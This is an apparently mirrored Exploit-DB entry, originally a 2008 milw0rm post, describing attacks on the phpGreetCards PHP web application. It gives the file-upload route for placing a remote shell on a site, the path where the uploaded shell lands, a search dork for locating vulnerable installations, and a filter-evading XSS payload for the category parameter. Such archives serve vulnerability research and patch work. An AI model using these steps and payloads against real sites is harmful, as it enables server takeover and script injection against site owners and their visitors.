bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7561.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1 KiB
Text
Raw Blame History

...................................................................................................
****(remote shell upload/xss)****
script: phpGreetCards
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
***************************************************************************
www.site.com/path/index.php?mode=select&category
shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"
if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************
Author: ahmadbady
**************************************************
# milw0rm.com [2008-12-23]
Reference in a new issue View git blame Copy permalink